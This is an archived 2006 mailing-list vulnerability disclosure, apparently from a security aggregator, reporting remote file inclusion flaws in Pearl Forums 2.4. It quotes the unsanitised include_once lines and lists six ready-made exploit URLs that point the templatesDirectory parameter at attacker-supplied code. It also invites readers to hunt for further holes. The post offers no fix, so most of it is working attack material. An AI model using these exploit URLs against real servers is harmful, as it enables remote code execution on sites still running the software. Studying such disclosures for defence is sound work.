Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

phpPC 1.04 Multiples Remote File Inclusion

PhotoCart 3.9 (adminprint. php) Remote File Include Vulnerability

Vulnerability in PostNuke

Advisory: LDU <= 8.x Remote SQL Injection Vulnerability.

From:	Dr Max Virus <drmaxvirus_(at)_w.cn>
Date:	22.11.2006
Subject:	Pearl Forums 2.4 Multiple Remote File Include Vulnerabilities

_____         __  __             __      ___
|  __ \       |  \/  |            \ \    / (_)
| |  | |_ __  | \  / | __ ___  __  \ \  / / _ _ __ _   _ ___
| |  | | '__| | |\/| |/ _` \ \/ /   \ \/ / | | '__| | | / __|
| |__| | |    | |  | | (_| |>  <     \  /  | | |  | |_| \__ \
|_____/|_|    |_|  |_|\__,_/_/\_\     \/   |_|_|   \__,_|___/


/////////////////////////////////////////////////////////////////////////////////
////////////////////////////
//Script:Pearl Forums
//Author: Dr Max Virus
//Location:Egypt :)
//Description:The main  Script Of Pearl Products
//Affected Version:2.4
//D
script:
http://sourceforge.net/project/downloading.php?group_id=102974&use_mirror=swi
tch&filename=pearlforums2.4.zip&351611
/////////////////////////////////////////////////////////////////////////////////
////////////////////////////
//-------------------------------------------------------------------------------
---

Bug in
 adressbook.php & admin.php & merge.php &
more than
u expected files r vulnerable just try to check all files
Like the Vulnerable Scripts Of Pearl

--------------------------------------------------------------------------------
\\

-------------------------------------------------------------------------------
Vul Codes:
include_once("$GlobalSettings[templatesDirectory]/addressbook.
php");
include_once("$templatesDirectory/admin.php");

---------------------------------------------------------------------------------
--
Exploits:
~~~~~~~~~
Note that more variables are not sanitized so Exploits can work
Successfuly when
register_globals=on



code
http://[target]/[path]/includes/admin.php?templatesDirectory-evill code
http://[target]/[path]/includes/password.
php?GlobalSettings[templatesDirectory]=evill
code
http://[target]/[path]/includes/profile.
php?GlobalSettings[templatesDirectory]=evill
code
http://[target]/[path]/includes/merge.
php?GlobalSettings[templatesDirectory]=evill
code
http://[target]/[path]/includes/adminPolls.
php?GlobalSettings[templatesDirectory]=evill
code
http://[target]/[path]/includes/poll.
php?GlobalSettings[templatesDirectory]=evill
code

   And Many Bug u can discovered just download the script

---------------------------------------------------------------------------------
--
   Thx To:str0ke & www.milw0rm.com & www.zone-h.com & All My Friends
   Special Gr33Ts:ASIANEAGLE & Kacper & The Master

/////////////////////////////////////////////////////////////////////////////////
///